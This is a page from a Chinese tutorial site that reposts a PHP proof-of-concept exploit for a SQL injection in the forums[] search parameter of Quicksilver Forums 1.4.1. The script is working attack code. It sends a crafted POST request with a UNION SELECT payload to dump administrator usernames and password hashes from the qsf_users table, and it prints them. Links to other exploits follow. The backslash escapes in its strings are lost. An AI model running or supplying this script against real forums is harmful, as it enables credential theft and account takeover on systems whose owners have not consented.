手机
当前位置:查字典教程网 >网络安全 >Exploit >Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
摘要:

<?php

/*

. vuln.: Quicksilver Forums 1.4.1 (forums[]) Remote SQL Injection Exploit

. download: http://www.quicksilverforums.com/

.

. author: irk4z[at]yahoo.pl

. homepage: http://irk4z.wordpress.com/

.

. greets: all friends ;)

.

. this is PoC exploit

*/

$host = $argv[1];

$path = $argv[2];

$prefix = "qsf_"; // this is default prefix

echo

".n. Quicksilver Forums 1.4.1 (forums[]) Remote SQL Injection Exploitn.n".

". author: irk4z[at]yahoo.pln".

". homepage: http://irk4z.wordpress.com/n".

".n".

". usage: php ".$argv[0]." host pathn".

". php ".$argv[0]." localhost /nn";

if(empty($host)||empty($path))die('# wrong host or path..');

$post_data = "query=I-like-it&forums[]=2)/**/limit/**/0/**/UNION/**/SELECT/**/1,1,concat(0x5b3a213a5d,user_name,0x3A,user_password,0x5b3a213a5d),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/".$prefix."users/**/WHERE/**/user_group=1/*&searchtype=match&member_text=&member_select=exact&showposts_check=on&limit_check=on&limit_chars=400&time_check=on&time_way_select=newer&time_select=31&submit=Search";

$data = "POST ".$path."index.php?a=search HTTP/1.1rn";

$data .= "Host: ".$host."rn";

$data .= "Content-Type: application/x-www-form-urlencodedrn";

$data .= "Content-length: ".strlen($post_data)."rn";

$data .= "Connection: Closern";

$data .= "rn";

$data .= $post_data."rnrn";

$s = @fsockopen($host, 80);

if (empty($s)) die('# wrong host..');

fputs($s, $data); $retu ='';

while(!feof($s)){

$retu .= fgets($s);

}

fclose($s);

$tmp = explode('[:!:]',$retu);

if(empty($tmp[1]))die('sorry, exploit failed.. maybe try again in a few seconds..');

echo " " . $tmp[1] . "nndone.";

?>

【Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit】相关文章:

LoveCMS 1.6.2 Final Update Settings Remote Exploit

fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

Dreampics Builder (page) Remote SQL Injection Vulnerability

phsBlog 0.2 Bypass SQL Injection Filtering Exploit

Joomla Component n-forms 1.01 Blind SQL Injection Exploit

webEdition CMS (we_objectID) Blind SQL Injection Exploit

TGS CMS 0.3.2r2 Remote Code Execution Exploit

minb 0.1.0 Remote Code Execution Exploit

精品推荐
分类导航